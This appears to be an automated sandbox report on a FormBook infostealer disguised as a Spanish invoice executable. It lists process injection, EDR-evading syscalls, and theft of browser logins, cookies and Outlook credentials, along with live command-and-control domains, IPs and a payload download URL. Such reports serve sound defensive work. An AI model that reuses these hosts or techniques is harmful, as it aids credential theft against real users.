              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674B0D0 mov eax, dword ptr fs:[00000030h]2_2_3674B0D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]2_2_3672B0D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]2_2_3672B0D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]2_2_3672B0D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]2_2_3672B0D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EB0AF mov eax, dword ptr fs:[00000030h]2_2_367EB0AF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367700A5 mov eax, dword ptr fs:[00000030h]2_2_367700A5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]2_2_367DF0A5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]2_2_367DF0A5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]2_2_367DF0A5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]2_2_367DF0A5

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FF8BB0B9E7F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x6E95ADJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeNtSuspendThread: Indirect: 0x36443B29Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6E24FAJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeNtResumeThread: Indirect: 0x36443E49Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6E9511Jump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeNtSetContextThread: Indirect: 0x36443809Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6E253EJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FF8F0B42651Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6E965CJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x491E716Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6EAB94Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x6E0AD8Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x4916B5FJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x6ED3D9Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x4916919Jump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeNtClose: Indirect: 0x3643F632
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6E16D2Jump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeNtQueueApcThread: Indirect: 0x3643F5A7Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x6E97A2
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x6E1E40Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6E24CBJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6E9704Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x4916AE8Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasphone.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeThread register set: target process: 6480Jump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeThread register set: target process: 6480Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerI/g
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040351C

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\rasphone.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\rasphone.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		11
              Masquerading              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Abuse Elevation Control Mechanism              		1
              Access Token Manipulation              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		312
              Process Injection              		NTDS2
              File and Directory Discovery              		Distributed Component Object Model1
              Clipboard Data              		3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets14
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Abuse Elevation Control Mechanism              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
              Obfuscated Files or Information              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592061 Sample: FACTURA PROFORMA MATRICULAC... Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 34 www.flourishno.life 2->34 36 www.fullhdfilmizlesene.uno 2->36 38 www.brunokito.cloud 2->38 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 4 other signatures 2->50 10 FACTURA PROFORMA MATRICULACI#U00d3N.exe 31 2->10         started        signatures3 process4 file5 26 C:\Users\user\AppData\...\Reorganisere.Cir, data 10->26 dropped 28 C:\Users\user\AppData\Local\...\System.dll, PE32 10->28 dropped 30 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->30 dropped 13 FACTURA PROFORMA MATRICULACI#U00d3N.exe 6 10->13         started        process6 dnsIp7 40 212.162.149.165, 49762, 80 UNREAL-SERVERSUS Netherlands 13->40 60 Modifies the context of a thread in another process (thread injection) 13->60 62 Maps a DLL or memory area into another process 13->62 64 Queues an APC in another process (thread injection) 13->64 66 Found direct / indirect Syscall (likely to bypass EDR) 13->66 17 RAVCpl64.exe 13->17 injected signatures8 process9 dnsIp10 32 www.flourishno.life 67.223.117.189, 49763, 80 VIMRO-AS15189US United States 17->32 42 Found direct / indirect Syscall (likely to bypass EDR) 17->42 21 rasphone.exe 13 17->21         started        signatures11 process12 signatures13 52 Tries to steal Mail credentials (via file / registry access) 21->52 54 Tries to harvest and steal browser information (history, passwords, etc) 21->54 56 Modifies the context of a thread in another process (thread injection) 21->56 58 2 other signatures 21->58 24 firefox.exe 21->24         started        process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              FACTURA PROFORMA MATRICULACI#U00d3N.exe21%ReversingLabsWin32.Trojan.Generic
              FACTURA PROFORMA MATRICULACI#U00d3N.exe100%AviraHEUR/AGEN.1337950
              FACTURA PROFORMA MATRICULACI#U00d3N.exe25%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://212.162.149.165/psKGLMYRljeu25.bin0%Avira URL Cloudsafe
              http://212.162.149.165/psKGLMYRljeu25.binu0%Avira URL Cloudsafe
              http://212.162.149.165/psKGLMYRljeu25.binE0%Avira URL Cloudsafe
              http://www.flourishno.life/qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa90%Avira URL Cloudsafe
              http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
              http://212.162.149.165/psKGLMYRljeu25.bino0%Avira URL Cloudsafe
              http://212.162.149.165/psKGLMYRljeu25.bin90%Avira URL Cloudsafe
              http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
              http://212.162.149.165/Q0%Avira URL Cloudsafe
              http://212.162.149.165/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.flourishno.life
              		67.223.117.189
              		truetrue
                		unknown
                www.brunokito.cloud
                		unknown
                		unknownfalse
                  		unknown
                  www.fullhdfilmizlesene.uno
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.flourishno.life/qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9true
                    • Avira URL Cloud: safe
                    		unknown
                    http://212.162.149.165/psKGLMYRljeu25.binfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdFACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                      		high
                      http://212.162.149.165/psKGLMYRljeu25.binEFACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://212.162.149.165/psKGLMYRljeu25.bin9FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://212.162.149.165/FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                        		high
                        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdFACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorErrorFACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096597469.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196408647.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://212.162.149.165/psKGLMYRljeu25.binuFACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006562000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDFACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                              		high
                              http://www.gopher.ftp://ftp.FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://212.162.149.165/QFACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://212.162.149.165/psKGLMYRljeu25.binoFACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              67.223.117.189
                              		www.flourishno.lifeUnited States
                              		15189VIMRO-AS15189UStrue
                              212.162.149.165
                              		unknownNetherlands
                              		64236UNREAL-SERVERSUSfalse

                              General Information

                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1592061
                              Start date and time:2025-01-15 18:16:18 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 16m 30s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:FACTURA PROFORMA MATRICULACI#U00d3N.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/10@3/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 93%
                              • Number of executed functions: 91
                              • Number of non-executed functions: 308
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              67.223.117.189PO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.actionhub.live/gq43/
                              PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.actionhub.live/gq43/
                              foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                              • www.gutpox.life/bcpd/
                              w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                              • www.uburn.xyz/iqqs/
                              enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                              • www.uburn.xyz/iqqs/
                              PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                              • www.heldhold.xyz/fava/
                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                              • www.heldhold.xyz/fava/
                              Enquiry.exeGet hashmaliciousFormBookBrowse
                              • www.uburn.xyz/iqqs/
                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                              • www.uburn.xyz/unks/
                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                              • www.uburn.xyz/unks/

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              UNREAL-SERVERSUSRJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                              • 212.162.149.53
                              FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 212.162.149.153
                              FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 212.162.149.153
                              rArz0wnYVU.exeGet hashmaliciousGuLoaderBrowse
                              • 212.162.149.94
                              rArz0wnYVU.exeGet hashmaliciousGuLoaderBrowse
                              • 212.162.149.94
                              RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                              • 212.162.149.92
                              Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 162.251.122.87
                              Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 162.251.122.87
                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 162.251.122.87
                              WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                              • 162.251.122.87
                              VIMRO-AS15189USPO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 67.223.117.189
                              PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 67.223.117.189
                              Scanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                              • 67.223.117.142
                              ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                              • 67.223.118.94
                              Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                              • 67.223.117.169
                              specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 67.223.117.169
                              dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                              • 67.223.117.169
                              PO AT-5228.exeGet hashmaliciousFormBookBrowse
                              • 67.223.117.142
                              shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                              • 67.223.117.142
                              fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                              • 67.223.118.17

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dllRevo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                  Thermo Fisher RFQ_TFS-1207.com.exeGet hashmaliciousGuLoaderBrowse
                                    Thermo Fisher RFQ_TFS-1207.com.exeGet hashmaliciousGuLoaderBrowse
                                      TRIAL_ORDER_CP.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        TRIAL_ORDER_CP.exeGet hashmaliciousGuLoaderBrowse
                                          Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                            FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.Cir

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):321034
                                                Entropy (8bit):7.573816828298902
                                                Encrypted:false
                                                SSDEEP:6144:iMEsA+pXikNwWATbVZvTWWGFFxRxvH7fXPd9b:4s1pXikN4TbfWWGPtvbH7
                                                MD5:3D1FF402CE5E021B4DD0F10B3D41BB7C
                                                SHA1:605E5279257E451934357E282580379056EF86DA
                                                SHA-256:7AB2FA914514E1998DC0930899523A52B2AB51D331B69069BB76E516CF22BA66
                                                SHA-512:69E0A2347FC0D8C7302B1792D1F6ECAED52F0D22FF6EC6FA1E8D405C91601B4F35FEC53D083BCA00C27E5E678D94F7CB3DDA0D54DBB629AE0540B093DFB9966A
                                                Malicious:true
                                                Yara Hits:
